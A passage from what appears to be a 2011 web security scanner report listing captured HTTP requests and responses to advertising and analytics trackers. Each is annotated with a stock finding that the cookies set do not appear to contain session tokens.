Eu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Location: http://ad.yieldmanager.com/pixel?id=108869&t=2 Content-Length: 0 Date: Sun, 24 Apr 2011 03:08:55 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rd/r.php?sid=14&pub=300009&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1 Host: affiliate.idgtracker.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6; uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1 HTTP/1.1 Host: affiliate.idgtracker.com Proxy-Connection: keep-alive Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: analytic.hotelclub.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/?t=pp&px=2853&rnd=[cachebuster] HTTP/1.1 Host: at.amgdgt.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJOVvjFDHGBmzbDBIcekOVM7Pu2ADA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GBmAxjPqt5b8aYRoBABTNBsn
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUXD2qAp.o9VSb5yRFcRQS0cy3DIQDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GIHOABrbWnU3DqIRAFGMGuw-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 03:08:32 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: http://ib.adnxs.com/seg?add=93909&t=2 Content-Length: 0 Date: Sun, 24 Apr 2011 03:08:31 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1548627385 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 24 Apr 2011 12:29:52 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 12:29:52 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web84 Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/ Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/ Content-Type: image/gif Date: Sun, 24 Apr 2011 03:08:32 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1 Host: clk.atdmt.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: ach00=903d/120af:fb75/120af; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db41880; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com Date: Sun, 24 Apr 2011 12:33:03 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1 HTTP/1.1 Host: cmi.netseer.com Proxy-Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /redirect?ex=10&t=1303614597199 HTTP/1.1 Host: cmi.netseer.com Proxy-Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/ HTTP/1.1 Host: ctix8.cheaptickets.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 303 Object Moved Connection: close Date: Sun, 24 Apr 2011 12:09:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/ Content-Length: 0 